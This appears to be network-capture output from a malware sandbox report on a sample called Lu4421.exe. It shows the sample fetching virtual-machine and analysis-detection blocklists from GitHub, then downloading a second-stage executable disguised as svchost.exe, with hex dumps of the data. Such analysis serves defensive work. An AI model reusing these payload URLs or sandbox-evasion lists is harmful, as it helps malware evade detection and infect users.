Dec 18, 2024 12:07:23.296003103 CET | 192.168.2.4 | 1.1.1.1 | 0x75fa | Standard query (0) | github.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 18, 2024 12:07:20.929658890 CET | 1.1.1.1 | 192.168.2.4 | 0xb809 | No error (0) | raw.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 12:07:20.929658890 CET | 1.1.1.1 | 192.168.2.4 | 0xb809 | No error (0) | raw.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 12:07:20.929658890 CET | 1.1.1.1 | 192.168.2.4 | 0xb809 | No error (0) | raw.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 12:07:20.929658890 CET | 1.1.1.1 | 192.168.2.4 | 0xb809 | No error (0) | raw.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 12:07:23.284399033 CET | 1.1.1.1 | 192.168.2.4 | 0x264f | Name error (3) | 41.140.13.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Dec 18, 2024 12:07:23.435605049 CET | 1.1.1.1 | 192.168.2.4 | 0x75fa | No error (0) | github.com | | 20.233.83.145 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 12:07:32.514070034 CET | 1.1.1.1 | 192.168.2.4 | 0x6322 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 12:07:32.514070034 CET | 1.1.1.1 | 192.168.2.4 | 0x6322 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
• raw.githubusercontent.com
• github.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49732 | 185.199.108.133 | 443 | 6768 | C:\Users\user\Desktop\Lu4421.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 11:07:22 UTC | 128 | OUT | GET /6nz/virustotal-vm-blacklist/main/pc_username_list.txt HTTP/1.1
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
2024-12-18 11:07:23 UTC | 900 | IN | HTTP/1.1 200 OK
    Connection: close
    Content-Length: 1275
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: text/plain; charset=utf-8
    ETag: "bbf75a064e165fba2b8fcc6595e496788fe27c3185ffa2fa56d3479e12867693"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: 86B5:2BDE8A:66285F:7029CD:6762ACE9
    Accept-Ranges: bytes
    Date: Wed, 18 Dec 2024 11:07:22 GMT
    Via: 1.1 varnish
    X-Served-By: cache-ewr-kewr1740069-EWR
    X-Cache: MISS
    X-Cache-Hits: 0
    X-Timer: S1734520043.803876,VS0,VE56
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    X-Fastly-Request-ID: c48d24bf7ccc5b8119806b702cf034d696d4b503
    Expires: Wed, 18 Dec 2024 11:12:22 GMT
    Source-Age: 0
2024-12-18 11:07:23 UTC | 1275 | IN | Data Raw: 30 35 68 30 30 47 69 30 0a 30 35 4b 76 41 55 51 4b 50 51 0a 32 31 7a 4c 75 63 55 6e 66 49 38 35 0a 33 75 32 76 39 6d 38 0a 34 33 42 79 34 0a 34 74 67 69 69 7a 73 4c 69 6d 53 0a 35 73 49 42 4b 0a 35 59 33 79 37 33 0a 67 72 65 70 65 74 65 0a 36 34 46 32 74 4b 49 71 4f 35 0a 36 4f 34 4b 79 48 68 4a 58 42 69 52 0a 37 44 42 67 64 78 75 0a 37 77 6a 6c 47 58 37 50 6a 6c 57 34 0a 38 4c 6e 66 41 61 69 39 51 64 4a 52 0a 38 4e 6c 30 43 6f 6c 4e 51 35 62 71 0a 38 56 69 7a 53 4d 0a 39 79 6a 43 50 73 45 59 49 4d 48 0a 41 62 62 79 0a 61 63 6f 78 0a 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 0a 41 6d 79 0a 61 6e 64 72 65 61 0a 41 70 70 4f 6e 46 6c 79 53 75 70 70 6f 72 74 0a 41 53 50 4e 45 54 0a 61 7a 75 72 65 0a 62 61 72 62 61 72 72 61 79 0a 62 65 6e 6a 61 68 0a 42 72 75 6e
    Data Ascii: 05h00Gi005KvAUQKPQ21zLucUnfI853u2v9m843By44tgiizsLimS5sIBK5Y3y73grepete64F2tKIqO56O4KyHhJXBiR7DBgdxu7wjlGX7PjlW48LnfAai9QdJR8Nl0ColNQ5bq8VizSM9yjCPsEYIMHAbbyacoxAdministratorAmyandreaAppOnFlySupportASPNETazurebarbarraybenjahBrun


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49734 | 185.199.108.133 | 443 | 6768 | C:\Users\user\Desktop\Lu4421.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 11:07:22 UTC | 119 | OUT | GET /6nz/virustotal-vm-blacklist/main/ip_list.txt HTTP/1.1
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
2024-12-18 11:07:23 UTC | 900 | IN | HTTP/1.1 200 OK
    Connection: close
    Content-Length: 2853
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: text/plain; charset=utf-8
    ETag: "a0f0ad87a3cc1741bf24d6d8ec37619ff28dab76edf802ca5ceb0e1349232152"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: 9490:3115D4:67D8AC:71DD86:6762ACE9
    Accept-Ranges: bytes
    Date: Wed, 18 Dec 2024 11:07:22 GMT
    Via: 1.1 varnish
    X-Served-By: cache-ewr-kewr1740028-EWR
    X-Cache: MISS
    X-Cache-Hits: 0
    X-Timer: S1734520043.810007,VS0,VE64
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    X-Fastly-Request-ID: 3ad63c5a743244ab848575a239bdce518ac7f36c
    Expires: Wed, 18 Dec 2024 11:12:22 GMT
    Source-Age: 0
2024-12-18 11:07:23 UTC | 1378 | IN | Data Raw: 31 30 2e 32 30 30 2e 31 36 39 2e 32 30 34 0a 31 30 34 2e 31 39 38 2e 31 35 35 2e 31 37 33 0a 31 30 34 2e 32 30 30 2e 31 35 31 2e 33 35 0a 31 30 39 2e 31 34 35 2e 31 37 33 2e 31 36 39 0a 31 30 39 2e 32 32 36 2e 33 37 2e 31 37 32 0a 31 30 39 2e 37 34 2e 31 35 34 2e 39 30 0a 31 30 39 2e 37 34 2e 31 35 34 2e 39 31 0a 31 30 39 2e 37 34 2e 31 35 34 2e 39 32 0a 31 34 30 2e 32 32 38 2e 32 31 2e 33 36 0a 31 34 39 2e 38 38 2e 31 31 31 2e 37 39 0a 31 35 34 2e 36 31 2e 37 31 2e 35 30 0a 31 35 34 2e 36 31 2e 37 31 2e 35 31 0a 31 37 32 2e 31 30 35 2e 38 39 2e 32 30 32 0a 31 37 34 2e 37 2e 33 32 2e 31 39 39 0a 31 37 36 2e 36 33 2e 34 2e 31 37 39 0a 31 37 38 2e 32 33 39 2e 31 36 35 2e 37 30 0a 31 38 31 2e 32 31 34 2e 31 35 33 2e 31 31 0a 31 38 35 2e 32 32 30 2e 31 30 31
    Data Ascii: 10.200.169.204104.198.155.173104.200.151.35109.145.173.169109.226.37.172109.74.154.90109.74.154.91109.74.154.92140.228.21.36149.88.111.79154.61.71.50154.61.71.51172.105.89.202174.7.32.199176.63.4.179178.239.165.70181.214.153.11185.220.101
2024-12-18 11:07:23 UTC | 1378 | IN | Data Raw: 30 2e 31 31 38 0a 32 31 33 2e 33 33 2e 31 39 30 2e 31 37 31 0a 32 31 33 2e 33 33 2e 31 39 30 2e 32 32 0a 32 31 33 2e 33 33 2e 31 39 30 2e 32 32 37 0a 32 31 33 2e 33 33 2e 31 39 30 2e 32 34 32 0a 32 31 33 2e 33 33 2e 31 39 30 2e 33 35 0a 32 31 33 2e 33 33 2e 31 39 30 2e 34 32 0a 32 31 33 2e 33 33 2e 31 39 30 2e 34 36 0a 32 31 33 2e 33 33 2e 31 39 30 2e 36 39 0a 32 31 33 2e 33 33 2e 31 39 30 2e 37 34 0a 32 33 2e 31 32 38 2e 32 34 38 2e 34 36 0a 33 34 2e 31 30 35 2e 30 2e 32 37 0a 33 34 2e 31 30 35 2e 31 38 33 2e 36 38 0a 33 34 2e 31 30 35 2e 37 32 2e 32 34 31 0a 33 34 2e 31 33 38 2e 32 35 35 2e 31 30 34 0a 33 34 2e 31 33 38 2e 39 36 2e 32 33 0a 33 34 2e 31 34 31 2e 31 34 36 2e 31 31 34 0a 33 34 2e 31 34 31 2e 32 34 35 2e 32 35 0a 33 34 2e 31 34 32 2e 37 34
                                                                                Data Ascii: 0.118213.33.190.171213.33.190.22213.33.190.227213.33.190.242213.33.190.35213.33.190.42213.33.190.46213.33.190.69213.33.190.7423.128.248.4634.105.0.2734.105.183.6834.105.72.24134.138.255.10434.138.96.2334.141.146.11434.141.245.2534.142.74
                                                                                2024-12-18 11:07:23 UTC97INData Raw: 35 2e 37 31 2e 36 35 0a 39 35 2e 32 35 2e 37 31 2e 37 30 0a 39 35 2e 32 35 2e 37 31 2e 38 30 0a 39 35 2e 32 35 2e 37 31 2e 38 36 0a 39 35 2e 32 35 2e 37 31 2e 38 37 0a 39 35 2e 32 35 2e 37 31 2e 38 39 0a 39 35 2e 32 35 2e 37 31 2e 39 32 0a 39 35 2e 32 35 2e 38 31 2e 32 34 0a 4e 6f 6e 65 0a
                                                                                Data Ascii: 5.71.6595.25.71.7095.25.71.8095.25.71.8695.25.71.8795.25.71.8995.25.71.9295.25.81.24None


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49735 | 185.199.108.133 | 443 | 6768 | C:\Users\user\Desktop\Lu4421.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 11:07:22 UTC | 123 | OUT | GET /6nz/virustotal-vm-blacklist/main/MachineGuid.txt HTTP/1.1
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
2024-12-18 11:07:23 UTC | 900 | IN | HTTP/1.1 200 OK
    Connection: close
    Content-Length: 1110
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: text/plain; charset=utf-8
    ETag: "1224175461dce581d971884e2b8af67d12f105702cbcc56be1043ccc84319e42"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: F2C3:189B9F:632926:6D2A70:6762ACE9
    Accept-Ranges: bytes
    Date: Wed, 18 Dec 2024 11:07:22 GMT
    Via: 1.1 varnish
    X-Served-By: cache-ewr-kewr1740023-EWR
    X-Cache: MISS
    X-Cache-Hits: 0
    X-Timer: S1734520043.805057,VS0,VE60
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    X-Fastly-Request-ID: 4c70cce27ad5eb8eb22b2193c924d1e91bb13cad
    Expires: Wed, 18 Dec 2024 11:12:22 GMT
    Source-Age: 0
                                                                                2024-12-18 11:07:23 UTC1110INData Raw: 30 38 31 61 62 33 39 35 2d 35 65 38 35 2d 34 36 33 34 2d 61 63 64 62 2d 32 64 62 64 34 66 35 39 61 37 64 30 0a 30 38 39 65 36 32 31 63 2d 31 34 32 32 2d 34 38 35 36 2d 61 38 62 31 2d 33 66 31 64 62 32 30 38 63 65 39 65 0a 31 30 37 39 37 66 31 64 2d 39 36 31 33 2d 34 38 33 32 2d 62 31 61 33 2d 63 32 32 66 65 33 36 35 62 38 39 64 0a 31 35 39 34 37 38 30 32 2d 63 62 39 63 2d 34 37 38 66 2d 61 66 35 63 2d 33 33 62 31 61 62 62 64 31 62 66 65 0a 31 61 38 35 63 36 36 30 2d 31 66 39 38 2d 34 32 63 61 2d 62 31 63 62 2d 31 39 39 66 36 33 65 31 64 38 30 37 0a 32 62 35 33 36 35 66 31 2d 65 65 62 62 2d 34 31 33 35 2d 62 36 65 31 2d 34 31 33 61 61 62 32 39 39 66 63 62 0a 34 35 30 38 61 66 64 33 2d 35 66 30 35 2d 34 39 31 65 2d 62 34 39 66 2d 62 34 34 30 32 34 39 36 37
                                                                                Data Ascii: 081ab395-5e85-4634-acdb-2dbd4f59a7d0089e621c-1422-4856-a8b1-3f1db208ce9e10797f1d-9613-4832-b1a3-c22fe365b89d15947802-cb9c-478f-af5c-33b1abbd1bfe1a85c660-1f98-42ca-b1cb-199f63e1d8072b5365f1-eebb-4135-b6e1-413aab299fcb4508afd3-5f05-491e-b49f-b44024967


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49733 | 185.199.108.133 | 443 | 6768 | C:\Users\user\Desktop\Lu4421.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 11:07:22 UTC | 124 | OUT | GET /6nz/virustotal-vm-blacklist/main/pc_name_list.txt HTTP/1.1
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
2024-12-18 11:07:22 UTC | 899 | IN | HTTP/1.1 200 OK
    Connection: close
    Content-Length: 3145
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: text/plain; charset=utf-8
    ETag: "72b0005e577398f4eb7596131aa14f87c4f7379acc30e24456d4830af5304467"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: A39E:60D60:6AC687:74C85C:6762ACE3
    Accept-Ranges: bytes
    Date: Wed, 18 Dec 2024 11:07:22 GMT
    Via: 1.1 varnish
    X-Served-By: cache-ewr-kewr1740039-EWR
    X-Cache: MISS
    X-Cache-Hits: 0
    X-Timer: S1734520043.806714,VS0,VE14
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    X-Fastly-Request-ID: 77918439d65622e1f8bfb4bb56100a6e9949fc50
    Expires: Wed, 18 Dec 2024 11:12:22 GMT
    Source-Age: 0
                                                                                2024-12-18 11:07:22 UTC1378INData Raw: 30 30 39 30 30 42 43 38 33 38 30 32 0a 30 30 39 30 30 42 43 38 33 38 30 33 0a 30 43 43 34 37 41 43 38 33 38 30 33 0a 31 38 43 39 41 43 44 46 2d 37 43 30 30 2d 34 0a 33 43 45 43 45 46 43 38 33 38 30 36 0a 36 43 34 45 37 33 33 46 2d 43 32 44 39 2d 34 0a 41 42 49 47 41 49 0a 41 43 45 50 43 0a 41 49 44 41 4e 50 43 0a 41 4c 45 4e 4d 4f 4f 53 2d 50 43 0a 41 4c 49 4f 4e 45 0a 41 50 50 4f 4e 46 4c 59 2d 56 50 53 0a 41 52 43 48 49 42 41 4c 44 50 43 0a 61 7a 75 72 65 0a 42 33 30 46 30 32 34 32 2d 31 43 36 41 2d 34 0a 42 41 52 4f 53 49 4e 4f 2d 50 43 0a 42 45 43 4b 45 52 2d 50 43 0a 42 45 45 37 33 37 30 43 2d 38 43 30 43 2d 34 0a 43 38 31 46 36 36 43 38 33 38 30 35 0a 43 41 54 57 52 49 47 48 54 0a 43 48 53 48 41 57 0a 43 4f 46 46 45 45 2d 53 48 4f 50 0a 43 4f 4d 50
                                                                                Data Ascii: 00900BC8380200900BC838030CC47AC8380318C9ACDF-7C00-43CECEFC838066C4E733F-C2D9-4ABIGAIACEPCAIDANPCALENMOOS-PCALIONEAPPONFLY-VPSARCHIBALDPCazureB30F0242-1C6A-4BAROSINO-PCBECKER-PCBEE7370C-8C0C-4C81F66C83805CATWRIGHTCHSHAWCOFFEE-SHOPCOMP
                                                                                2024-12-18 11:07:22 UTC1378INData Raw: 46 4f 0a 44 45 53 4b 54 4f 50 2d 4c 54 4d 43 4b 4c 41 0a 44 45 53 4b 54 4f 50 2d 4d 4a 43 36 35 30 30 0a 44 45 53 4b 54 4f 50 2d 4d 57 46 52 56 4b 48 0a 44 45 53 4b 54 4f 50 2d 4e 41 4b 46 46 4d 54 0a 44 45 53 4b 54 4f 50 2d 4e 4b 50 30 49 34 50 0a 44 45 53 4b 54 4f 50 2d 4e 4d 31 5a 50 4c 47 0a 44 45 53 4b 54 4f 50 2d 4e 54 55 37 56 55 4f 0a 44 45 53 4b 54 4f 50 2d 4f 36 46 42 4d 46 37 0a 44 45 53 4b 54 4f 50 2d 4f 37 42 49 33 50 54 0a 44 45 53 4b 54 4f 50 2d 50 41 30 46 4e 56 35 0a 44 45 53 4b 54 4f 50 2d 50 4b 51 4e 44 53 52 0a 44 45 53 4b 54 4f 50 2d 51 4c 4e 32 56 55 46 0a 44 45 53 4b 54 4f 50 2d 51 55 41 59 38 47 53 0a 44 45 53 4b 54 4f 50 2d 52 43 41 33 51 57 58 0a 44 45 53 4b 54 4f 50 2d 52 48 58 44 4b 57 57 0a 44 45 53 4b 54 4f 50 2d 52 50 34 46
                                                                                Data Ascii: FODESKTOP-LTMCKLADESKTOP-MJC6500DESKTOP-MWFRVKHDESKTOP-NAKFFMTDESKTOP-NKP0I4PDESKTOP-NM1ZPLGDESKTOP-NTU7VUODESKTOP-O6FBMF7DESKTOP-O7BI3PTDESKTOP-PA0FNV5DESKTOP-PKQNDSRDESKTOP-QLN2VUFDESKTOP-QUAY8GSDESKTOP-RCA3QWXDESKTOP-RHXDKWWDESKTOP-RP4F
                                                                                2024-12-18 11:07:22 UTC389INData Raw: 45 45 4c 35 33 53 4e 0a 57 49 4e 5a 44 53 2d 31 42 48 52 56 50 51 55 0a 57 49 4e 5a 44 53 2d 32 32 55 52 4a 49 42 56 0a 57 49 4e 5a 44 53 2d 33 46 46 32 49 39 53 4e 0a 57 49 4e 5a 44 53 2d 35 4a 37 35 44 54 48 48 0a 57 49 4e 5a 44 53 2d 36 54 55 49 48 4e 37 52 0a 57 49 4e 5a 44 53 2d 38 4d 41 45 49 38 45 34 0a 57 49 4e 5a 44 53 2d 39 49 4f 37 35 53 56 47 0a 57 49 4e 5a 44 53 2d 41 4d 37 36 48 50 4b 32 0a 57 49 4e 5a 44 53 2d 42 30 33 4c 39 43 45 4f 0a 57 49 4e 5a 44 53 2d 42 4d 53 4d 44 38 4d 45 0a 57 49 4e 5a 44 53 2d 42 55 41 4f 4b 47 47 31 0a 57 49 4e 5a 44 53 2d 4b 37 56 49 4b 34 46 43 0a 57 49 4e 5a 44 53 2d 4d 49 4c 4f 42 4d 33 35 0a 57 49 4e 5a 44 53 2d 50 55 30 55 52 50 56 49 0a 57 49 4e 5a 44 53 2d 51 4e 47 4b 47 4e 35 39 0a 57 49 4e 5a 44 53 2d
                                                                                Data Ascii: EEL53SNWINZDS-1BHRVPQUWINZDS-22URJIBVWINZDS-3FF2I9SNWINZDS-5J75DTHHWINZDS-6TUIHN7RWINZDS-8MAEI8E4WINZDS-9IO75SVGWINZDS-AM76HPK2WINZDS-B03L9CEOWINZDS-BMSMD8MEWINZDS-BUAOKGG1WINZDS-K7VIK4FCWINZDS-MILOBM35WINZDS-PU0URPVIWINZDS-QNGKGN59WINZDS-


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49731 | 185.199.108.133 | 443 | 6768 | C:\Users\user\Desktop\Lu4421.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 11:07:22 UTC | 120 | OUT | GET /6nz/virustotal-vm-blacklist/main/gpu_list.txt HTTP/1.1
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
2024-12-18 11:07:23 UTC | 900 | IN | HTTP/1.1 200 OK
    Connection: close
    Content-Length: 1246
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: text/plain; charset=utf-8
    ETag: "30981a4a96ce3533cb33ae7620077db7a4a8377cb1ef8fcfc8a07293fa2937d6"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: 6058:310945:9D76D7:ABD208:6762ACE8
    Accept-Ranges: bytes
    Date: Wed, 18 Dec 2024 11:07:22 GMT
    Via: 1.1 varnish
    X-Served-By: cache-ewr-kewr1740020-EWR
    X-Cache: MISS
    X-Cache-Hits: 0
    X-Timer: S1734520043.806602,VS0,VE66
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    X-Fastly-Request-ID: 40e029e2d736f144f624436975bd9d1d09a52f93
    Expires: Wed, 18 Dec 2024 11:12:22 GMT
    Source-Age: 0
                                                                                2024-12-18 11:07:23 UTC1246INData Raw: 32 39 5f 5f 48 45 52 45 0a 32 47 36 43 37 5a 36 31 0a 32 52 4f 5f 38 55 56 55 0a 32 53 4e 35 33 38 4b 34 0a 35 4b 42 4b 34 31 5f 4c 0a 35 4c 58 50 41 38 45 53 0a 35 50 45 43 4e 36 4c 31 0a 35 52 50 46 54 33 48 5a 0a 36 42 4f 53 34 4f 37 55 0a 36 42 5a 50 32 59 32 5f 0a 36 46 34 34 41 44 52 37 0a 36 4d 50 41 39 33 0a 37 32 32 39 48 39 47 39 0a 37 34 5a 5a 43 59 37 41 0a 37 54 42 39 47 36 50 37 0a 38 34 4b 44 31 4b 53 4b 0a 38 4e 59 47 4b 33 46 4c 0a 38 59 33 42 53 58 4b 47 0a 39 53 46 37 32 46 47 37 0a 39 5a 37 37 44 4e 34 54 0a 5f 47 33 31 45 34 36 4e 0a 5f 50 48 4c 4e 59 47 52 0a 5f 54 39 57 35 4c 48 4f 0a 41 46 52 42 52 36 54 43 0a 41 4d 44 20 52 61 64 65 6f 6e 20 48 44 20 38 36 35 30 47 0a 41 53 50 45 45 44 20 47 72 61 70 68 69 63 73 20 46 61 6d 69 6c
                                                                                Data Ascii: 29__HERE2G6C7Z612RO_8UVU2SN538K45KBK41_L5LXPA8ES5PECN6L15RPFT3HZ6BOS4O7U6BZP2Y2_6F44ADR76MPA937229H9G974ZZCY7A7TB9G6P784KD1KSK8NYGK3FL8Y3BSXKG9SF72FG79Z77DN4T_G31E46N_PHLNYGR_T9W5LHOAFRBR6TCAMD Radeon HD 8650GASPEED Graphics Famil


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49730 | 185.199.108.133 | 443 | 6768 | C:\Users\user\Desktop\Lu4421.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 11:07:22 UTC | 126 | OUT | GET /6nz/virustotal-vm-blacklist/main/processes_list.txt HTTP/1.1
    Host: raw.githubusercontent.com
    Connection: Keep-Alive
2024-12-18 11:07:23 UTC | 898 | IN | HTTP/1.1 200 OK
    Connection: close
    Content-Length: 31
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: text/plain; charset=utf-8
    ETag: "b8ccbe01df84b6df59046ff7ef97fe02bbba9374a7a63f24d1c8a0b07083adca"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: A8FE:1D65EC:60AA01:6AAE56:6762ACE7
    Accept-Ranges: bytes
    Date: Wed, 18 Dec 2024 11:07:22 GMT
    Via: 1.1 varnish
    X-Served-By: cache-ewr-kewr1740033-EWR
    X-Cache: MISS
    X-Cache-Hits: 0
    X-Timer: S1734520043.805342,VS0,VE74
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    X-Fastly-Request-ID: 1e52387be6d9b94197ccfb253e040ec99f49bc81
    Expires: Wed, 18 Dec 2024 11:12:22 GMT
    Source-Age: 0
                                                                                2024-12-18 11:07:23 UTC31INData Raw: 56 6d 52 65 6d 6f 74 65 47 75 65 73 74 2e 65 78 65 0a 53 79 73 6d 6f 6e 36 34 2e 65 78 65 0a
                                                                                Data Ascii: VmRemoteGuest.exeSysmon64.exe


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49736 | 20.233.83.145 | 443 | 6768 | C:\Users\user\Desktop\Lu4421.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 11:07:25 UTC | 105 | OUT | GET /kgnfth/tumblr/raw/refs/heads/main/svchost.exe HTTP/1.1
    Host: github.com
    Connection: Keep-Alive
2024-12-18 11:07:25 UTC | 556 | IN | HTTP/1.1 302 Found
    Server: GitHub.com
    Date: Wed, 18 Dec 2024 11:07:25 GMT
    Content-Type: text/html; charset=utf-8
    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
    Access-Control-Allow-Origin:
    Location: https://raw.githubusercontent.com/kgnfth/tumblr/refs/heads/main/svchost.exe
    Cache-Control: no-cache
    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
    X-Frame-Options: deny
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 0
    Referrer-Policy: no-referrer-when-downgrade
                                                                                2024-12-18 11:07:25 UTC3380INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49737 | 185.199.108.133 | 443 | 6768 | C:\Users\user\Desktop\Lu4421.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-18 11:07:27 UTC | 92 | OUT | GET /kgnfth/tumblr/refs/heads/main/svchost.exe HTTP/1.1
    Host: raw.githubusercontent.com
2024-12-18 11:07:27 UTC | 899 | IN | HTTP/1.1 200 OK
    Connection: close
    Content-Length: 65024
    Cache-Control: max-age=300
    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
    Content-Type: application/octet-stream
    ETag: "9f76b04e02d12553ee7b428273b66996671537fc6643d70be5486cafb79a6fd4"
    Strict-Transport-Security: max-age=31536000
    X-Content-Type-Options: nosniff
    X-Frame-Options: deny
    X-XSS-Protection: 1; mode=block
    X-GitHub-Request-Id: B16E:D7775:A3CCB6:B23A74:6762ACEF
    Accept-Ranges: bytes
    Date: Wed, 18 Dec 2024 11:07:27 GMT
    Via: 1.1 varnish
    X-Served-By: cache-nyc-kteb1890072-NYC
    X-Cache: MISS
    X-Cache-Hits: 0
    X-Timer: S1734520047.463020,VS0,VE88
    Vary: Authorization,Accept-Encoding,Origin
    Access-Control-Allow-Origin: *
    Cross-Origin-Resource-Policy: cross-origin
    X-Fastly-Request-ID: e008e1c360e712f16dc00b052ed40440ad1dd749
    Expires: Wed, 18 Dec 2024 11:12:27 GMT
    Source-Age: 0
                                                                                2024-12-18 11:07:27 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 3a 83 3e 67 00 00 00 00 00 00 00 00 e0 00 02 00 0b 01 08 00 00 ea 00 00 00 12 00 00 00 00 00 00 0e 09 01 00 00 20 00 00 00 20 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
